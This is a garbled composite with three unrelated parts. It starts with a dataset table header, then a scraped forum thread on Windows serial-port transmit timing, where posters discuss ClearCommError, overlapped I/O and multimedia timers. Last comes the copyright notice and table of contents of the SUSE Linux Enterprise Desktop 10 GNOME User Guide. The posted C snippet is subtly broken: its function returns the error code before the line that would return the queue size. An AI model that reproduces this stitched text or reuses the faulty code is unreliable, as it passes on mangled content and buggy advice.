text
stringlengths 454
608k
| url
stringlengths 17
896
| dump
stringlengths 9
15
⌀ | source
stringclasses 1
value | word_count
int64 101
114k
| flesch_reading_ease
float64 50
104
|
---|---|---|---|---|---|
you need wait untill all bytes will be sended ;-)
while(GetOutQueueSize()) Sleep(0);
where
UINT GetOutQueueSize()
{
COMSTAT Stat ;
DWORD dwErr = 0;
ClearCommError(m_hPort, &dwErr, &Stat);
return (int)dwErr;
return Stat.cbOutQue ;
}
I tried the method you have sujjested but it remains at the same. It is like a dubble check that proves that the buffer is empty and indeed it is empty although the phisical layer hasn't transfered yet. Therefore when I change baudrate after these checks it cuts the transmition of the syncbreak.
I tried working with a loopback in hardware - here I am trying to assert that the byte was transfered by receiving it into the receive buffer - this method was too slow - about 40 bits time.
An other method was implementing a timer but this is not reliable as they have a latency of 10 to 55 mSec depending on the PC.
Any idea of how to overcome?
Ronny
Quote from MSDN:
cbOutQue
Specifies the number of bytes of user data remaining to be transmitted for all write operations. This value will be zero for a nonoverlapped write.
This means you need to go to overlapped IO in order to get the number of bytes in the buffer.
This course will teach participants about installing and configuring Python, syntax, importing, statements, types, strings, booleans, files, lists, tuples, comprehensions, functions, and classes.
I looked in MSDN in a technicle article "complition I/O". It says that overlapped events can achieve signal completion as in nonoverlapped. I tried that too but it is no better.
It seems that I should find a way to get a shorter latency with timers. I need a latency that is shorter from 2 milli seconds.
Any idea how can I achieve that?
Thanks, Ronny
You can use HighResolution (or Multimedia) timers
see timeSetEvent in MSDN
DarthMod
Community Support Moderator
Experts Exchange Solution brought to you by
Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.Start your 7-day free trial | https://www.experts-exchange.com/questions/20778363/Serial-Communication-NT-95-NONOVERLAPPED-does-not-block-execution-untill-HW-end-sending-message-It-seems-that-the-buffer-get-erased-before-all-bits-are-sent-by-the-transport.html | CC-MAIN-2018-30 | refinedweb | 344 | 63.7 |
Are you sure?
This action might not be possible to undo. Are you sure you want to continue?
SUSE Linux Enterprise Desktop
10
GNOME USER GUIDE
July 17, 2006
novdocx (ENU) 01 February 2006 2004-2006 Novell, Inc. All rights reserved. Permission GFDL can be found at. THIS DOCUMENT AND MODIFIED VERSIONS OF THIS DOCUMENT ARE PROVIDED UNDER THE TERMS OF THE GNU FREE DOCUMENTATION LICENSE WITH THE FURTHER UNDERSTANDING THAT: 1. THE DOCUMENT IS PROVIDED ON AN “AS IS” BASIS, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES THAT THE DOCUMENT OR MODIFIED VERSION OF THE DOCUMENT IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR PURPOSE, OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY, ACCURACY, AND PERFORMANCE OF THE DOCUMENT OR MODIFIED VERSION OF THE DOCUMENT IS WITH YOU. SHOULD ANY DOCUMENT OR MODIFIED VERSION PROVE DEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL WRITER, AUTHOR OR ANY CONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY DOCUMENT OR MODIFIED VERSION OF THE DOCUMENT IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER; AND 2. UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER IN TORT (INCLUDING NEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE AUTHOR, INITIAL WRITER, ANY CONTRIBUTOR, OR ANY DISTRIBUTOR OF THE DOCUMENT OR MODIFIED VERSION OF THE DOCUMENT, OR ANY SUPPLIER OF ANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER DAMAGES OR LOSSES ARISING OUT OF OR RELATING TO USE OF THE DOCUMENT AND MODIFIED VERSIONS OF THE DOCUMENT, EVEN IF SUCH PARTY SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES.vdocx (ENU) 01 February 2006
Novell, Inc. 404 Wyman Street, Suite 500 Waltham, MA 02451 U.S.A. Online Documentation: To access the online documentation for this and other Novell products, and to get updates, see.
novdocx (ENU) 01 February 2006
Novell Trademarks
For Novell trademarks, see the Novell Trademark and Service Mark list ( trademarks/tmlist.html).
Third-Party Materials
All third-party trademarks are the property of their respective owners. Parts of this manual are copyright © 2003-2004 Sun Microsystems.
novdocx (ENU) 01 February 2006
Contents
About This Guide Part I GNOME Desktop 1 Getting Started with the GNOME Desktop
1.1 Starting SLED . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.1.1 What Is a Session? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.1.2 Switching Desktops . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.1.3 Locking Your Screen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Logging Out . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Desktop Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.3.1 Default Desktop Icons . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.3.2 Desktop Menu . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.3.3 Bottom Panel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.3.4 Adding Applets and Applications to the Panel. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.3.5 Main Menu. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Accessing Folders and Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.4.1 Managing Folders and Files with Nautilus File Manager. . . . . . . . . . . . . . . . . . . . . . 1.4.2 Accessing Floppy Disks, CDs, or DVDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.4.3 Finding Files on Your Computer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.4.4 Accessing Files on the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Opening or Creating Documents with OpenOffice.org. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Exploring the Internet. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E-mail and Calendering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Moving Text between Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Other Useful Programs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Obtaining Software Updates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
11 13 15
15 15 16 16 16 17 17 18 18 19 20 20 20 22 23 25 29 29 29 29 30 30
1.2 1.3
1.4
1.5 1.6 1.7 1.8 1.9 1.10
2 Customizing Your Settings
2.1 Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.1.1 Configuring Bluetooth Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.1.2 Configuring Your Graphics Card and Monitor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.1.3 Modifying Keyboard Preferences . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.1.4 Configuring the Mouse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.1.5 Installing and Configuring Printers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.1.6 Configuring Removable Drives and Media . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.1.7 Configuring a Scanner. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.1.8 Specifying Screen Resolution Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Look and Feel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.2.1 Changing the Desktop Background. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.2.2 Configuring Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.2.3 Configuring the Screen Saver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.2.4 Choosing a Theme . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.2.5 Customizing Window Behavior . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Personal. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.3.1 Configuring Keyboard Accessibility Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.3.2 Configuring Assistive Technology Support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.3.3 Changing Your Password . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
31
32 32 32 32 36 38 39 39 40 40 41 42 43 44 46 47 47 49 50
2.2
2.3
5
novdocx (ENU) 01 February 2006
2.4
2.3.4 2.3.5 System 2.4.1 2.4.2 2.4.3 2.4.4 2.4.5 2.4.6 2.4.7 2.4.8 2.4.9
Configuring Language Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50 Customizing Keyboard Shortcuts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51 Configuring Search with Beagle Settings. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52 Configuring Date and Time . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52 Configuring Network Proxies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52 Configuring Power Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53 Setting Preferred Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54 Setting Session Sharing Preferences . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55 Managing Sessions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56 Setting Sound Preferences . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59 Managing Users and Groups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
Part II Office and Collaboration 3 The OpenOffice.org Office Suite
3.1
63 65
3.2
3.3
3.4
3.5 3.6 3.7 3.8
Understanding OpenOffice.org . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 3.1.1 What’s New in OpenOffice.org 2.0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66 3.1.2 Enhancements in the Novell Edition of OpenOffice.org 2.0 . . . . . . . . . . . . . . . . . . . . 66 3.1.3 Using the Standard Edition of OpenOffice.org . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67 3.1.4 Compatibility with Other Office Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67 3.1.5 Starting OpenOffice.org . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69 3.1.6 Improving OpenOffice.org Load Time . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69 3.1.7 Customizing OpenOffice.org . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69 3.1.8 Finding Templates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 Word Processing with Writer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 3.2.1 Creating a New Document . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73 3.2.2 Sharing Documents with Other Word Processors . . . . . . . . . . . . . . . . . . . . . . . . . . . 73 3.2.3 Formatting with Styles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74 3.2.4 Using Templates to Format Documents. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76 3.2.5 Working with Large Documents . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76 3.2.6 Using Writer as an HTML Editor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78 Using Spreadsheets with Calc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78 3.3.1 Using Formatting and Styles in Calc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 3.3.2 Using Templates in Calc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 Using Presentations with Impress . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 3.4.1 Creating a Presentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 3.4.2 Using Master Pages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 Using Databases with Base . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81 3.5.1 Creating a Database Using Predefined Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81 Creating Graphics with Draw . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 Creating Mathematical Formulas with Math . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84 Finding Help and Information About OpenOffice.org . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
4 Evolution: E-Mail and Calendaring
4.1 4.2
85
Starting Evolution for the First Time . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85 4.1.1 Using the First-Run Assistant. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85 Using Evolution: An Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93 4.2.1 The Menu Bar . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94 4.2.2 The Shortcut Bar . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94 4.2.3 E-Mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95 4.2.4 The Calendar . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96 4.2.5 The Contacts Tool . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96
6
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
5 GroupWise Linux Client: E-Mailing and Calendaring
5.1
99
5.2
5.3
5.4 5.5 5.6
Getting Acquainted with the Main GroupWise Window . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99 5.1.1 Toolbar . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100 5.1.2 Folder and Item List Header . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100 5.1.3 Folder List . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101 5.1.4 Item List . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 5.1.5 QuickViewer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 Using Different GroupWise Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 5.2.1 Online Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 5.2.2 Caching Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 Understanding Your Mailbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105 5.3.1 Bolded Items in Your Mailbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105 5.3.2 Icons Appearing Next to Items in Your Mailbox and Calendar . . . . . . . . . . . . . . . . 105 Using the Toolbar . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107 Using Shortcut Keys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107 Learning More . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109 5.6.1 Online Help . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109 5.6.2 GroupWise 7 Documentation Web Page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109 5.6.3 GroupWise Cool Solutions Web Community. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
6 Instant Messaging with Gaim
6.1 6.2 6.3 Supported Protocols . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Setting Up an Account . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Managing Your Buddy List. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6.3.1 Displaying Buddies in the Buddy List . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6.3.2 Adding a Buddy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6.3.3 Removing a Buddy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Chatting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
111
111 111 112 112 112 112 112
6.4
7 Using Voice over IP
7.1 Configuring Linphone. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7.1.1 Determining the Run Mode of Linphone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7.1.2 Determining the Connection Type . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7.1.3 Configuring the Network Parameters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7.1.4 Configuring the Sound Device. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7.1.5 Configuring the SIP Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7.1.6 Configuring the Audio Codecs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Testing Linphone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Making a Call . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Answering a Call . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Using the Address Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Troubleshooting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Glossary. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . For More Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
113
113 113 113 114 115 115 116 116 116 117 117 118 119 119
7.2 7.3 7.4 7.5 7.6 7.7 7.8
8 Managing Printers
8.1 Installing a Printer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8.1.1 Installing a Network Printer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8.1.2 Installing a Local Printer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Modifying Printer Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Canceling Print Jobs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
121
121 121 121 122 122
8.2 8.3
7
novdocx (ENU) 01 February 2006
8.4
Deleting a Printer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
Part III Internet 9 Browsing with Firefox
9.1
123 125
9.2
9.3
9.4 9.5
9.6 9.7
Navigating Web Sites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125 9.1.1 Tabbed Browsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126 9.1.2 Using the Sidebar. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126 Finding Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126 9.2.1 Finding Information on the Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126 9.2.2 Installing a Different Search Engine. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126 9.2.3 Searching in the Current Page. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126 Managing Bookmarks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127 9.3.1 Using the Bookmark Manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127 9.3.2 Importing Bookmarks from Other Browsers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128 9.3.3 Live Bookmarks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128 Using the Download Manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128 Customizing Firefox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128 9.5.1 Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129 9.5.2 Changing Themes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129 9.5.3 Adding Smart Keywords to Your Online Searches . . . . . . . . . . . . . . . . . . . . . . . . . 130 Printing from Firefox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131 For More Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Part IV Multimedia 10 Manipulating Graphics with The GIMP
10.1 10.2
133 135
10.3
10.4 10.5 10.6
Graphics Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135 Starting GIMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135 10.2.1 Initial Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135 10.2.2 The Default Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135 Getting Started in GIMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136 10.3.1 Creating a New Image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136 10.3.2 Opening an Existing Image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137 10.3.3 Scanning an Image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137 10.3.4 The Image Window . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137 Saving Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138 Printing Images. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139 For More Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
11 Using Digital Cameras with Linux
11.1 11.2 11.3 11.4 11.5 11.6
141
Downloading Pictures from Your Camera . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143 Getting Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143 Managing Tags . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144 Search and Find . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144 Exporting Image Collections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144 Basic Image Processing with f-spot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
12 Playing and Managing Your Music with Helix Banshee
12.1
147
Managing Your Library . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
8
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
12.2 12.3 12.4
12.1.1 Playing Your Music . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12.1.2 Organizing Your Music . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12.1.3 Importing Music . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Using Helix Banshee with Your iPod . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Creating Audio and MP3 CDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Configuring Preferences . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
148 148 148 149 150 150
13 Burning CDs and DVDs Part V Appendixes A Getting to Know Linux Software
A.1 A.2 A.3 A.4 A.5 A.6 Office . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Multimedia . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Graphics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . System and File Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Software Development . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
151 153 155
155 158 161 165 167 170
9
novdocx (ENU) 01 February 2006
10
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
About This Guide
